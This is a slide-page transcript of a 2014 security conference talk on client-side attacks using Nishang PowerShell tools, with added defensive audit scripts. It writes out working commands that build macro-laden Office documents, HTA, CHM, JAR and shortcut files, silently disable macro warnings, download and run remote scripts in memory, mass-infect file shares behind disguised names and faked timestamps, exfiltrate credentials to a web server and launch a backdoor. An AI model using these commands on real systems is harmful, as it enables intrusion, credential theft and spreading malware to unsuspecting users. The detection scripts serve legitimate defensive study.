Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 

Client side attacks using PowerShell

1. Lethal Client Side Attacks using PowerShell
Nikhil Mittal, DeepSec 2014

2. Get-Host
• SamratAshok
• Twitter - @nikhil_mitt
• Blog – http://labofapenetrationtester.com
• Creator of Kautilya and Nishang
• Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.
• Previous Talks
  – Clubhack’10, Hackfest’11, Clubhack’11, Black hat Abu Dhabi’11, Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, Troopers’14

3. Get-Content
• Client Side Attacks
• What is PowerShell
• Why PowerShell?
• Using PowerShell for client side attacks
  – Out-Word
  – Out-Excel
  – Out-Shortcut
  – Out-CHM
  – Out-Java
  – Out-HTA
• Defense against such attacks
• Conclusion

4. “Of war, there is open war, concealed war and silent war…..one can prevail only by maintaining secrecy when striking again and again” – Chanakya

5. Client Side Attacks
• The server side is being locked down like never before: protection measures, patching and extensive monitoring. There is no dearth of vulnerabilities on the server side, but exploiting them is getting more and more difficult.
• I noticed an unprecedented pace by clients while applying patches for Heartbleed, Shellshock etc.
• There are higher chances of getting noticed if we use server side attacks.

6. Client Side Attacks
• The client side is still a lower priority when it comes to patches, monitoring and other security measures.
• The “perimeter-ized” network is still the norm.
• I still found older versions of Adobe Reader on client machines during penetration tests.
• There are fewer chances of getting caught if the attack begins from a user’s machine.

7. Client Side Attacks
• Another thing which helps client side attacks: when users use the same credentials, data, servers and emails on a daily basis, they tend to become casual about them. They cease to attach much importance to those things as they seem normal to them.
8. Client Side Attacks
• It is still better not to rely on exploitation of memory corruption bugs in client side attacks. Generally, those are more prone to get caught.
• It would be really nice if we were able to launch client side attacks with things built-in or native to the operating system we have to target.
• This is where PowerShell comes into the picture.

9. What is PowerShell
• “Windows PowerShell® is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en-us/library/bb978526.aspx

10. Why PowerShell
• A shell and scripting language already present on the most common targets in a penetration test.
• A powerful method to “reside” in the systems and network.
• Provides easy access to .Net classes, WMI, Windows API, WinRM, Registry etc.
• Less dependence on msf and on *nix scripts converted to executables.

11. Using PowerShell for Client Side Attacks
• Using PowerShell in a client side attack results in impressive post exploitation.
• We not only get easy access to everything on the compromised system, but also to other machines on the domain network.
• That makes it an ideal scripting language for such attacks.

12. Using PowerShell for Client Side Attacks
• Let's begin with Microsoft Office documents.
13. Out-Word.ps1
• Use Out-Word to generate “armed” or “infected” MS Word documents.
• The generated Word document has an auto-executing macro which runs the provided PowerShell payload.
• The PowerShell payload executes silently without affecting the normal usage of the Word document.

14. Out-Word.ps1
• The command below generates a Word file named Salary_Details.doc:
  Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
• Though you would be unable to see the output in the above example, let's see what happened.

15. Out-Word.ps1
• Notice that we do not get any warning regarding macros when we open the document. Why? Because of these lines in the code:
  New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$($Word.Version)\Word\Security" -Name AccessVBOM -Value 1 -Force | Out-Null
  New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$($Word.Version)\Word\Security" -Name VBAWarnings -Value 1 -Force | Out-Null
• AccessVBOM = 1 grants programmatic access to the VBA project object model, which the script needs in order to insert the macro; VBAWarnings = 1 corresponds to “Enable all macros” in the Trust Center.

16. Out-Word.ps1
• We have effectively disabled Word macro security for the current user on the computer where the script is executed.
  – So, if we execute the script on our system and send the files to the target, the target will see the warning.
  – But, if the script is executed on the target computer, no such warning is displayed.
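A defender-side check for the two registry values shown above, added here as an example; it is not part of the talk or of Nishang. It walks every Office version key under HKCU and reports, for Word, Excel and PowerPoint, whether VBAWarnings or AccessVBOM has been set to 1, the values Out-Word writes. The application list, the Weakened flag and the remediation commands in the trailing comment are this example's own assumptions; the key layout and value meanings are the ones Out-Word relies on.

```powershell
# Added example (not from the talk or Nishang): audit the per-user Office
# macro-security values that Out-Word/Out-Excel overwrite, for every Office
# version key present under HKCU. Emits one object per version/application.
function Get-OfficeMacroTrust {
    [CmdletBinding()]
    param(
        # Hypothetical default list of applications whose Security key is inspected.
        [string[]]$Apps = @('Word', 'Excel', 'PowerPoint')
    )

    # VBAWarnings maps to Trust Center > Macro Settings:
    #   1 = Enable all macros (the value Out-Word/Out-Excel write)
    #   2 = Disable all macros with notification (the default)
    #   3 = Disable all macros except digitally signed macros
    #   4 = Disable all macros without notification
    $vbaMeaning = @{
        1 = 'Enable all macros (WEAK)'
        2 = 'Disable with notification (default)'
        3 = 'Disable except digitally signed'
        4 = 'Disable without notification'
    }

    $officeRoot = 'HKCU:\Software\Microsoft\Office'
    if (-not (Test-Path $officeRoot)) { return }

    # Version keys are named 14.0, 15.0, 16.0, ...; skip Common, Outlook etc.
    foreach ($versionKey in Get-ChildItem -Path $officeRoot | Where-Object { $_.PSChildName -match '^\d+\.\d+$' }) {
        $version = $versionKey.PSChildName
        foreach ($app in $Apps) {
            $secKey = "$officeRoot\$version\$app\Security"
            if (-not (Test-Path $secKey)) { continue }

            $props = Get-ItemProperty -Path $secKey
            $warn  = $props.VBAWarnings
            $vbom  = $props.AccessVBOM
            if ($null -eq $warn) { $meaning = 'not set (default applies)' }
            else                 { $meaning = $vbaMeaning[[int]$warn] }

            [pscustomobject]@{
                Version     = $version
                Application = $app
                VBAWarnings = $warn
                Meaning     = $meaning
                AccessVBOM  = $vbom
                # Out-Word sets both to 1; either one alone deserves a look.
                Weakened    = ($warn -eq 1) -or ($vbom -eq 1)
            }
        }
    }
}

# Usage: show weakened entries only.
Get-OfficeMacroTrust | Where-Object { $_.Weakened } | Format-Table -AutoSize

# Remediation for one key (example values; the path layout is the one Out-Word writes to):
#   Set-ItemProperty    -Path 'HKCU:\Software\Microsoft\Office\16.0\Word\Security' -Name VBAWarnings -Value 2
#   Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Word\Security' -Name AccessVBOM
```

Run it as the user whose Office profile is in question: the keys live under HKCU, so an audit from an administrator's console shows the administrator's settings, not the victim's. VBAWarnings = 1 together with AccessVBOM = 1 is the exact footprint of Out-Word or Out-Excel having been run on that machine.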
17. Out-Word.ps1
• The default payload of the script downloads and executes a PowerShell script in memory. Thus, the easiest way to use it is:
  Out-Word -PayloadURL http://yourwebserver.com/evil.ps1

18. Out-Word.ps1
• The URL is passed to the code below:
  powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments

19. Out-Word.ps1
• Note that we can also pass arguments to the script being downloaded. For example:
  Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil
• This is useful when the script only loads a function into memory, or a PowerShell module is used: the argument is the call that runs after the download.
• The macro code uses WMI (the Win32_Process class) to create a process from the payload we pass to it.

20. Out-Word.ps1
• Now, what if we get access to a file server and want to infect all files, or the files in a particular directory? Use the command below:
  Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles
• In the C:\docfiles directory, a macro-enabled .doc file is created for every .docx file, with the same name and the same LastWriteTime.

21. Out-Word.ps1
• Use the -Recurse option to recursively generate .doc files under the docfiles directory:
  Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles -Recurse
• Use -RemoveDocx to delete the original .docx files after the .doc files have been generated.

22. Out-Word.ps1
• The LastWriteTime of the .docx file is copied to the newly generated infected file to make it look authentic.
• Also, because Windows hides the extensions of known file types by default, “.docx” is appended to the generated .doc file names, so the user still sees what looks like the original .docx.
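The two tells described in slides 20 to 22 (a .docx name with .doc tacked on, and a LastWriteTime copied from an older file) can be hunted for. The function below is an added example, not code from the talk or from Nishang; the extension list and the two-second tolerance are its own assumptions.

```powershell
# Added example (not from the talk or Nishang): look for the artefacts that the
# -WordFileDir mode leaves behind in a directory tree.
function Find-SuspiciousOfficeFiles {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$Recurse,
        # Hypothetical tolerance so ordinary sub-second timestamp jitter is not reported.
        [int]$ToleranceSeconds = 2
    )

    # Legacy (macro-capable) formats that the Out-Word/Out-Excel output uses.
    $legacy = '.doc', '.xls', '.ppt', '.docm', '.xlsm', '.pptm'

    Get-ChildItem -Path $Path -File -Recurse:$Recurse -ErrorAction SilentlyContinue |
        Where-Object { $legacy -contains $_.Extension.ToLower() } |
        ForEach-Object {
            $reasons = @()
            # Heuristic 1: ".docx.doc" style names; only the leading ".docx" is
            # visible when Explorer hides known extensions.
            if ($_.Name -match '(?i)\.(docx|xlsx|pptx)\.(doc|xls|ppt)$') {
                $reasons += 'double extension'
            }
            # Heuristic 2: the file was "modified" before it was created. Copying an
            # old LastWriteTime onto a freshly created file does exactly this. Plain
            # file copies show the same pattern, so treat a hit as a lead, not proof.
            if (($_.CreationTime - $_.LastWriteTime).TotalSeconds -gt $ToleranceSeconds) {
                $reasons += 'LastWriteTime earlier than CreationTime'
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    FullName      = $_.FullName
                    CreationTime  = $_.CreationTime
                    LastWriteTime = $_.LastWriteTime
                    Reasons       = $reasons -join '; '
                }
            }
        }
}

# Usage, e.g. on the share from the slides above:
Find-SuspiciousOfficeFiles -Path 'C:\docfiles' -Recurse | Format-Table -AutoSize
```

The second heuristic works because the generated file is new (its CreationTime is the moment Out-Word ran) while its LastWriteTime was deliberately set back to the original's; a file that claims to have been modified before it existed is worth opening in a sandbox.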
23. Out-Excel.ps1
• Out-Excel works exactly the same as Out-Word, with the same features, payloads etc.
• I prefer Out-Excel, as in my experience users are generally more OK with macros in Excel than in Word.

24. Out-HTA.ps1
• Use this to generate an HTML Application and the accompanying VBScript. These can be deployed on a web server.
• When a user opens the HTA, the VBScript is executed which, in turn, executes the specified PowerShell payload.

25. Out-HTA.ps1
• The default name of the HTA is WindDef_WebInstall.hta and of the VBS it is launchps.vbs.
• Both files should be hosted in the same directory of a web server, or the HTA should be modified to point to the correct path of the VBScript.

26. Out-HTA.ps1
• Use the command below to generate the files:
  Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
• As in the other client side attacks we discussed, you can also use a PowerShell module:
  Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
27. Out-Java.ps1
• Out-Java can be used to execute PowerShell commands and scripts.
• It outputs four files: a .java file which contains the Java source, a .class file which is the compiled Java class, a manifest.txt file and an executable JAR.
• It needs a JDK on the attacker’s machine.

28. Out-Java.ps1
• Use the command below:
  Out-Java -Payload "Get-Process" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
• To download and execute a script in memory, use this:
  Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

29. Out-Java.ps1
• You can also use PowerShell modules:
  Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
30. Out-Shortcut.ps1
• Out-Shortcut creates a shortcut (.lnk) which can be used for executing PowerShell commands and scripts.
• When the target user clicks on the shortcut, whose target is set to PowerShell, the predefined command or script is executed.
• The target user will see a window flash/open.

31. Out-Shortcut.ps1
• Use the command below to execute a PowerShell command:
  Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
• Use the command below to download and execute, in memory, a PowerShell script:
  Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1

32. Out-Shortcut.ps1
• If Out-Shortcut is executed on the target, we can set a hotkey for the shortcut so that it executes every time the key is pressed, and give it a familiar icon:
  Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'
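Reading shortcuts back through the same WScript.Shell COM interface they are written with gives a cheap audit of what Out-Shortcut leaves behind: an interpreter as the target, download-and-execute or hidden-window arguments, a hotkey, and an icon borrowed from another program. The function below is an added example, not from the talk or from Nishang; the default folders, the interpreter list and the argument patterns are assumptions made for illustration.

```powershell
# Added example (not from the talk or Nishang): inspect .lnk files and flag the
# properties that Out-Shortcut sets (interpreter target, cradle arguments,
# hotkey, mismatched icon).
function Get-SuspiciousShortcut {
    [CmdletBinding()]
    param(
        # Hypothetical defaults: the places where users double-click shortcuts.
        [string[]]$Path = @(
            "$env:USERPROFILE\Desktop",
            "$env:APPDATA\Microsoft\Windows\Start Menu",
            "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        ),
        [switch]$Recurse
    )

    $interpreters = '(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)(\.exe)?$'
    $cradle = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b|-EncodedCommand|-enc\b|-WindowStyle\s+hidden|-ExecutionPolicy\s+Bypass'

    $shell = New-Object -ComObject WScript.Shell
    try {
        Get-ChildItem -Path $Path -Filter *.lnk -File -Recurse:$Recurse -ErrorAction SilentlyContinue |
            ForEach-Object {
                # CreateShortcut() on an existing .lnk loads it rather than creating a new one.
                $lnk = $shell.CreateShortcut($_.FullName)
                $targetName = [IO.Path]::GetFileName($lnk.TargetPath)
                $reasons = @()

                if ($lnk.TargetPath -match $interpreters) { $reasons += "target is $targetName" }
                if ($lnk.Arguments -match $cradle)         { $reasons += 'download/execute or hidden-window arguments' }
                if ($lnk.Hotkey)                           { $reasons += "hotkey $($lnk.Hotkey)" }
                # Icon taken from another binary (notepad.exe in the slide) while the target is an interpreter.
                if ($lnk.TargetPath -match $interpreters -and
                    $lnk.IconLocation -match '^[^,]*\.(exe|dll|ico)' -and
                    $lnk.IconLocation -notmatch [regex]::Escape($targetName)) {
                    $reasons += 'icon does not match target'
                }

                if ($reasons.Count -gt 0) {
                    [pscustomobject]@{
                        Shortcut  = $_.FullName
                        Target    = $lnk.TargetPath
                        Arguments = $lnk.Arguments
                        Hotkey    = $lnk.Hotkey
                        Icon      = $lnk.IconLocation
                        Reasons   = $reasons -join '; '
                    }
                }
            }
    }
    finally {
        [void][Runtime.InteropServices.Marshal]::ReleaseComObject($shell)
    }
}

# Usage:
Get-SuspiciousShortcut -Recurse | Format-Table Shortcut, Target, Hotkey, Reasons -AutoSize
```

A hotkey on a shortcut is the detail most likely to be missed: the shortcut never has to be clicked, so it can sit unnoticed on the desktop while the payload re-runs on every F3 press.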
33. Out-CHM.ps1
• We can also use Compiled HTML Help files (CHM) to execute PowerShell commands and scripts.
• When the target opens the CHM file, the predefined command or script is executed.
• The target user will see a window flash/open.

34. Out-CHM.ps1
• Use the command below to execute a PowerShell command:
  Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

35. Out-CHM.ps1
• Use the command below to execute an encoded command/script:
  Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
• Use Invoke-Encode from Nishang for encoding.

36. Out-CHM.ps1
• Use the command below to download and execute a script in memory:
  Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
37. More complex attacks
• Any of the tools discussed can be used for more effective attacks, like exfiltrating credentials:
  Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments "Credentials | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/test/data.php"

38. More complex attacks
• We can do some really cool stuff, like running a backdoor with a new communications channel:
  Out-Shortcut -PayloadURL "http://192.168.254.1/Gupt-Backdoor.ps1" -Arguments "Gupt-Backdoor -MagicString op3n -Verbose"

39. More complex attacks
• We can do egress testing:
  Out-Shortcut -PayloadURL "http://192.168.254.1/FireBuster.ps1" -Arguments "FireBuster 192.168.254.1 4443-4447"

40. More complex attacks
• Other machines on the network can be port scanned:
  Out-Shortcut -PayloadURL "http://192.168.254.1/Port-Scan.ps1" -Arguments "Port-Scan -StartAddress 192.168.254.1 -EndAddress 192.168.254.254 -ResolveHost -ScanPort"
• In practice we are unlikely to know the target's network range in advance as in the above example, so we would rather scan all hosts in the current network segment.

41. More complex attacks
• We can also launch other client side attacks from the payload. For example, let's infect every Word file in the C:\client directory:
  Out-Shortcut -PayloadURL "http://192.168.254.1/Out-Word.ps1" -Arguments "Out-Word -PayloadURL http://192.168.254.1/Speak.ps1 -WordFileDir C:\client"

42. More complex attacks
• We can force-browse, or download and execute, exploits to escalate privileges.
• On Windows 8, we can dump web credentials stored in the Windows Vault in plain text (admin privileges required).
• We can check whether the current user has privileges to access other machines on the network.
• And much more.
43. Defense
• User awareness is the best defense against such attacks.
• Removing VBA from MS Office would help against the Office document attacks, but it could break so many things.
• Active monitoring of user machines may also help in detecting such attacks.
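One concrete form of the "active monitoring" this slide calls for: the payloads in slides 18, 31 and 35 all reduce to a powershell.exe command line carrying a download cradle, a hidden window switch or an -EncodedCommand blob. The function below, an added example that is not from the talk or from Nishang, scores such command lines (for instance the CommandLine field of Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled) and decodes -EncodedCommand payloads first so the inner script is scored too. The indicator weights, the threshold and the three sample command lines are constructed for illustration.

```powershell
# Added example (not from the talk or Nishang): score process command lines for
# the PowerShell download-and-execute and encoded-command patterns.
function Test-PowerShellCradle {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)

    begin {
        # Indicator regex -> weight. The weights and the threshold below are
        # hypothetical starting points; tune them against your own baseline.
        $indicators = [ordered]@{
            'DownloadString|DownloadFile|DownloadData'                   = 3
            'Net\.WebClient|Invoke-WebRequest|\biwr\b|Invoke-RestMethod' = 2
            '\bIEX\b|Invoke-Expression'                                  = 3
            '-ExecutionPolicy\s+Bypass|-ep\s+bypass'                     = 1
            '-WindowStyle\s+hidden|-w\s+hidden'                          = 2
            '-NoProfile|-nop\b'                                          = 1
            '-EncodedCommand|-enc\b|-e\s+[A-Za-z0-9+/=]{20,}'            = 2
            'Win32_Process|winmgmts'                                     = 1   # WMI launch, as in the macro
        }
        $threshold = 5
    }

    process {
        $inner = $null
        # -EncodedCommand (and its prefixes -e, -ec, -enc ...) carries base64 of
        # UTF-16LE text, which is what Invoke-Encode emits. Decode it so the
        # indicators are matched against the inner script as well.
        if ($CommandLine -match '(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{20,})') {
            try { $inner = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) } catch { }
        }
        $haystack = if ($inner) { "$CommandLine $inner" } else { $CommandLine }

        $hits = @(foreach ($pattern in $indicators.Keys) {
            if ($haystack -match "(?i)$pattern") { $pattern }
        })
        $score = 0
        foreach ($h in $hits) { $score += $indicators[$h] }

        [pscustomobject]@{
            Score       = $score
            Suspicious  = $score -ge $threshold
            Indicators  = $hits.Count
            Decoded     = $inner
            CommandLine = $CommandLine
        }
    }
}

# Constructed sample command lines (not real logs): the cradle from slide 18,
# an encoded variant of it, and a benign administrative command.
$url = 'http://yourwebserver.com/evil.ps1'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("IEX ((New-Object Net.WebClient).DownloadString('$url'))"))
@(
    "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$url'))"
    "powershell.exe -WindowStyle hidden -EncodedCommand $encoded"
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler"
) | Test-PowerShellCradle | Format-Table Score, Suspicious, Indicators, CommandLine -AutoSize
```

Where PowerShell 5 script block logging (Event ID 4104) is available, run the same scoring over the ScriptBlockText field as well: that catches payloads whose parent is WINWORD.EXE, hh.exe or mshta.exe but whose command line was kept short by pointing at a script that is only read once it is running.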
44. Conclusion
• Use of PowerShell makes these attacks much more lethal and powerful.
• We need not stop at getting a shell; we can go much further using only client side attacks.
• The attacks will continue as long as users keep opening attachments and clicking on links, that is, forever :)

45. Recommended PowerShell Tools
• Nishang
• PowerSploit
• Posh-SecMod
• Veil-PowerView
• PowerUp
• PoshSec
• Kansa
• Voyeur
• Powercat

46. Credits/Reference
• Thanks to DeepSec for accepting me.
• Macro code for MS Office documents has been taken from Matt’s work: https://github.com/enigma0x3
• The idea for Out-CHM is taken from this tweet and the attached file: https://twitter.com/ithurricanept/status/534993743196090368

47. Thank You
• Questions?
• I am looking for contributors.
• Nishang is available at https://github.com/samratashok/nishang
• Follow me @nikhil_mitt
• nikhil.uitrgpv@gmail.com
• http://labofapenetrationtester.com/

Editor's Notes

  1. Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/